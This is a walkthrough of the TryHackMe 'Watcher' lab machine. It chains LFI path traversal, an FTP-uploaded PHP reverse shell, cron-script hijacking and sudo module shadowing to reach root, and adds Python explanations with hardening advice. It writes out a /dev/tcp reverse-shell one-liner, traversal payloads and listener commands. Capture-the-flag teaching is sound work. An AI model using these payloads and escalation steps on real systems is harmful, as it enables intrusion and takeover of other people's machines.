Watcher Tryhackme Writeup

By Shamsher khan. This is a writeup of the TryHackMe room “Watcher”.


Room link: https://tryhackme.com/room/watcher
Note: This room is free

Introduction

Watcher was an eloquently constructed beginner level box designed to help introduce some key concepts and methods that are often seen across various penetration testing platforms. Despite not having any particularly difficult parts, it required some out of the box thinking as well as the ability to effectively analyse and chain together exploitation techniques. It’s a relatively long box, but provides a thoroughly enjoyable learning experience.

Initial Enumeration


Initial nmap scan shows the following ports:
21 vsftpd (up to date)
22 SSH 7.6p1 (up to date)
80 HTTP with Jekyll 4.1.1

Web Server

Running a gobuster on the web server:

gobuster dir -u 10.10.211.47 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt

Browsing to the website and checking /robots.txt shows some interesting entries.


/flag_1.txt contains the first flag. The second entry, /secret_file_do_not_read.txt, can’t be accessed directly. Something to remember for later.


Going back to the initial webpage, there is little functionality aside from the links behind each placemat photo.


The description page for each placemat has a GET parameter in the URL which selects the post being displayed:

http://10.10.211.47/post.php?post=striped.php


post.php includes whatever file the post parameter names, and the value isn’t validated, so we can perform a local file inclusion (LFI) attack. Going to http://10.10.211.47/post.php?post=../../../etc/passwd shows the users on the box.


Now we have a way to read files from the server. Thinking back to our initial look at robots.txt, there was a file we didn’t have access to; maybe we can get to it via the file inclusion vulnerability? The include reads the file straight from disk as the web server user, so whatever blocked the direct HTTP request doesn’t apply. We can assume the web root is /var/www/html as that’s the default location.

http://10.10.211.47/post.php?post=../../../var/www/html/secret_file_do_not_read.txt

We get credentials.
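The path arithmetic behind the two includes above (and the one used later to include the uploaded PHP shell), together with the check a developer would add to post.php, as an added Python example that is not code from the room or from this writeup. It assumes the web root is /var/www/html, as the writeup does, and the allowlist of post names is constructed for the example (only striped.php comes from the page).

```python
import posixpath

# Assumed web root; the writeup assumes the Apache default /var/www/html too.
WEB_ROOT = "/var/www/html"

# Constructed allowlist of the post files post.php should be able to include.
# striped.php is from the writeup; spotted.php is made up for the example.
KNOWN_POSTS = {"striped.php", "spotted.php"}


def traversal_payload(target, depth):
    """Build the value handed to ?post= for an absolute target path.

    Each '../' climbs one directory; from /var/www/html three are enough to
    reach '/', and extra ones are harmless because '/..' stays at '/'.
    """
    return "../" * depth + target.lstrip("/")


def vulnerable_resolve(post_param):
    """Equivalent of PHP's include($_GET['post']) relative to the web root with
    no validation: the parameter is joined to WEB_ROOT and normalised, so
    '..' segments (or an absolute path) walk straight out of the web root.
    """
    return posixpath.normpath(posixpath.join(WEB_ROOT, post_param))


def hardened_resolve(post_param):
    """Only include a bare filename that is on the allowlist, and verify the
    normalised path still sits under WEB_ROOT. Returns None on rejection.
    """
    # Any directory component (../, /etc/..., ./x) changes the basename.
    if post_param != posixpath.basename(post_param):
        return None
    if post_param not in KNOWN_POSTS:
        return None
    resolved = posixpath.normpath(posixpath.join(WEB_ROOT, post_param))
    # Belt and braces: confirm containment even though the checks above imply it.
    if posixpath.commonpath([WEB_ROOT, resolved]) != WEB_ROOT:
        return None
    return resolved


if __name__ == "__main__":
    for p in ("../../../etc/passwd",
              "../../../var/www/html/secret_file_do_not_read.txt",
              "../../../home/ftpuser/ftp/files/shell.php",
              "striped.php"):
        print(f"{p:55} vulnerable -> {vulnerable_resolve(p)}  hardened -> {hardened_resolve(p)}")
```

The allowlist is what actually closes the hole; the basename and containment checks are there so a later edit to the allowlist (say, someone adding a name with a slash in it) still cannot reopen it.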

FTP

Now we have credentials, it is time to explore FTP! Connect and authenticate using ftp 10.10.211.47. Once logged in, running dir to list the directory shows the second flag and a folder called files.


The files directory is empty, but the permissions show it is writable. The message we got the credentials from says “I’ve set the files to be saved to /home/ftpuser/ftp/files”. Since we can write to this directory, we can upload files to the server and we know exactly where they land on disk.

Grab a PHP reverse shell from pentestmonkey’s GitHub and edit it to contain your IP and the port you plan to host a netcat listener on.

Shell.php


Then go back into the FTP server, change into the files folder and use the put command to upload the shell.


Since we know the path of the upload, we can include the PHP file through the LFI and the server will execute the code inside it. First, though, we need a netcat listener waiting to catch the connection.


Then browse to 10.10.211.47/post.php?post=../../../home/ftpuser/ftp/files/shell.php (changing the file name to whatever you uploaded it as) and the listener should catch a reverse shell.


Here we get a reverse shell.

Get a TTY shell

script -qc /bin/bash /dev/null

Personally, I always like to check out the web folder when I get into a box to see if there are any files or database credentials lying about. Going to /var/www/html and typing ls shows the contents of the directory. All the files and directories there are the ones we saw before, aside from more_secrets_a9f10a.


In here is the third flag!

Lateral Movement

The next thing I do is check the less-used directories, such as /opt and /media, in case there’s anything lying about. In /opt/ there is a backups directory that is owned by root and accessible by the adm group, so there is a potential avenue if we get a user that is part of that group.


Going to the /home/ directories next, both toby and mat have a readable note.txt.


Since toby has flag 4, I’ll assume that’s the first user to get. The note talks about mat setting up cron jobs.


If we run sudo -l to check our sudo permissions, we can see that we can run ALL commands without a password as the user toby.


Going back to the cron job information we found earlier, the plan is to edit a cron job that executes as mat in order to get a shell as him. In the jobs folder there is a cow.sh file, owned by our current user (toby), that constantly copies BEEFY pictures to /tmp. Because we own it, we can edit it. /etc/crontab shows the script runs every minute as the user mat: cron runs a job as the user named in the crontab entry regardless of who owns the script file, so anything we append to cow.sh executes as mat.


Add a reverse shell to the file the cron job executes, changing the IP and port to your own. Before doing so, start a netcat listener:

nc -lvp 4444

echo 'bash -c "bash -i >& /dev/tcp/10.2.12.26/4444 0>&1"' >> cow.sh


Then, after a minute or so, mat’s cron job will execute the now-malicious script and send us a reverse shell as his user.


We can now get flag 5.
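The condition that made the cow.sh step work (a script writable by one user but run by cron as another) is easy to check for systematically. The following is an added Python example, not code from the room or the writeup; the crontab text, file ownership table and group membership are constructed to mirror the situation described above (cow.sh owned by toby, run every minute as mat), and the two extra jobs are made up for contrast.

```python
import re

# Constructed /etc/crontab modelled on what the writeup describes: cow.sh runs
# every minute as mat. The other two jobs are made up for contrast.
CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*  *    * * *   mat     /home/mat/cow.sh
*/5 *   * * *   root    /opt/backups/rotate.sh
"""

# Constructed stand-in for stat(): path -> (owner, group, mode).
# cow.sh being owned by toby is the situation the writeup found.
FILE_INFO = {
    "/home/mat/cow.sh": ("toby", "toby", 0o755),
    "/opt/backups/rotate.sh": ("root", "root", 0o744),
}

# Constructed group membership for the users involved.
GROUPS = {"toby": {"toby"}, "mat": {"mat"}, "root": {"root"}}

# Five schedule fields, the user field, then the command (system crontab format).
CRON_RE = re.compile(r"^(\S+\s+\S+\s+\S+\s+\S+\s+\S+)\s+(\S+)\s+(.+)$")


def parse_system_crontab(text):
    """Return [(schedule, user, command)] for each job line, skipping comments,
    blank lines and VAR=value settings."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        m = CRON_RE.match(line)
        if m:
            jobs.append((m.group(1), m.group(2), m.group(3)))
    return jobs


def writable_by(user, owner, group, mode):
    """POSIX write check: owner bit, group bit, or other bit (root's override
    is deliberately ignored; root is not who we are auditing for)."""
    if user == owner and mode & 0o200:
        return True
    if group in GROUPS.get(user, set()) and mode & 0o020:
        return True
    return bool(mode & 0o002)


def hijackable_jobs(crontab_text, attacker):
    """Jobs whose script the attacker can write but which cron runs as someone
    else: exactly the toby -> mat path the writeup uses. Returns
    [(script, runs_as)]."""
    findings = []
    for _schedule, runs_as, command in parse_system_crontab(crontab_text):
        script = command.split()[0]
        if not script.startswith("/") or script not in FILE_INFO:
            continue  # shell builtins like 'cd', or files we have no stat for
        owner, group, mode = FILE_INFO[script]
        if runs_as != attacker and writable_by(attacker, owner, group, mode):
            findings.append((script, runs_as))
    return findings


if __name__ == "__main__":
    for who in ("toby", "mat"):
        print(who, "->", hijackable_jobs(CRONTAB, who))
```

On a real box you would replace FILE_INFO with os.stat() lookups and GROUPS with grp; the same check also applies to anything the script itself sources or executes from a directory the attacker can write, which this simplified version does not follow.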

In the note in mat’s home directory, will explains that mat can run python3 scripts as will using sudo. Running sudo -l confirms this.


In the scripts directory there are two files: cmd.py and will_script.py.


At the end of will_script.py it runs a system command taken from cmd, selected by the first argument passed to the script. cmd.py is owned by mat and maps 1 to ls -lah, 2 to id and 3 to cat /etc/passwd; will_script.py seems to allow only those three commands.


Editing files in a raw netcat shell is awkward, since interactive editors need a proper terminal (TERM and a pty) that such a shell lacks, and we can’t edit will_script.py anyway. Since the files are in mat’s home directory and we are mat, we add our reverse shell to cmd.py instead.


Now start a netcat listener:

nc -lvp 3333

We can run will_script.py with will’s privileges via sudo, but we can’t edit it. Since it pulls its command from cmd.py, which we can edit, whatever we add to cmd.py executes as will when will_script.py is run through sudo.


And here we get a shell as will.


We get flag 6.
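The mechanism that turned a writable cmd.py into code running as will can be reproduced locally without sudo. The following is an added Python example, not the room’s scripts (the writeup does not reproduce them); it assumes will_script.py does a plain import of cmd and looks the command up by its first argument, and it plants a marker file where the writeup appended a reverse shell so the demonstration runs offline. The point it makes: Python puts the script’s own directory first on sys.path, so a cmd.py next to will_script.py shadows even the standard library’s cmd module, and whoever can write that file controls what the sudo’d interpreter runs.

```python
import os
import subprocess
import sys
import tempfile
import textwrap

# Stand-ins for the two scripts; the writeup does not reproduce them.
# ASSUMPTION: will_script.py does `import cmd` and picks the command by its
# first argument. Because Python puts the script's own directory at the front
# of sys.path, the cmd.py next to it shadows even the standard-library cmd
# module, so whoever can write that directory controls what runs.
WILL_SCRIPT = textwrap.dedent("""\
    import os
    import sys
    import cmd  # resolved from sys.path[0], the directory of this script

    print("CMD_FILE=" + cmd.__file__, flush=True)
    choice = sys.argv[1] if len(sys.argv) > 1 else "1"
    os.system(cmd.get_command(choice))
""")

CMD_PY = textwrap.dedent("""\
    def get_command(choice):
        # The three commands the writeup says cmd.py offers.
        return {"1": "ls -lah", "2": "id", "3": "cat /etc/passwd"}.get(choice, "id")
""")

# What gets prepended to cmd.py. The writeup appends a reverse shell; this
# stand-in just drops a marker file so the demonstration runs offline.
INJECT = "open({marker!r}, 'w').write('code ran as the invoking user')\n"


def run_scenario(inject):
    """Create the two scripts in a temp dir, optionally plant INJECT in cmd.py,
    run will_script.py from a different working directory, and report whether
    the planted code executed and which cmd module was imported."""
    with tempfile.TemporaryDirectory() as work:
        will_path = os.path.join(work, "will_script.py")
        cmd_path = os.path.join(work, "cmd.py")
        marker = os.path.join(work, "hijacked.txt")
        with open(will_path, "w") as f:
            f.write(WILL_SCRIPT)
        with open(cmd_path, "w") as f:
            f.write((INJECT.format(marker=marker) if inject else "") + CMD_PY)
        # cwd is elsewhere on purpose: the import is driven by the script's
        # location, not by where the sudo user happens to be standing.
        proc = subprocess.run(
            [sys.executable, will_path, "2"],
            capture_output=True, text=True, cwd=os.path.dirname(work), check=False,
        )
        imported = ""
        for line in proc.stdout.splitlines():
            if line.startswith("CMD_FILE="):
                imported = line[len("CMD_FILE="):]
        return {
            "returncode": proc.returncode,
            "hijacked": os.path.exists(marker),
            "local_cmd_used": os.path.realpath(imported) == os.path.realpath(cmd_path),
        }


if __name__ == "__main__":
    print("clean run:   ", run_scenario(inject=False))
    print("planted run: ", run_scenario(inject=True))
```

The fix on the defending side is the usual one for sudo rules pointing at scripts: the script and every module it imports must live in a directory the target user, not the invoking user, owns, or the rule is equivalent to ALL.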

Using id we can see that we are part of the adm group. Remember that backups folder we found earlier that was accessible to the adm group? Let’s go check it out.


Echoing the key and piping it to base64 -d reveals a private key.


Save this to a file and remember to chmod 600 it, or ssh will refuse to use a key file with wider permissions.

Could it be that this is the root SSH key?!


And finally we get the root flag.

You can find me on:
LinkedIn:- https://www.linkedin.com/in/shamsher-khan-651a35162/
Twitter:- https://twitter.com/shamsherkhannn
Tryhackme:- https://tryhackme.com/p/Shamsher


For more walkthroughs, stay tuned, and thank you for taking the time to read this one. If you found it helpful, please share it with others with similar interests. Feedback is always welcome!

Web Application Pen-tester || CTF Player || Security Analyst
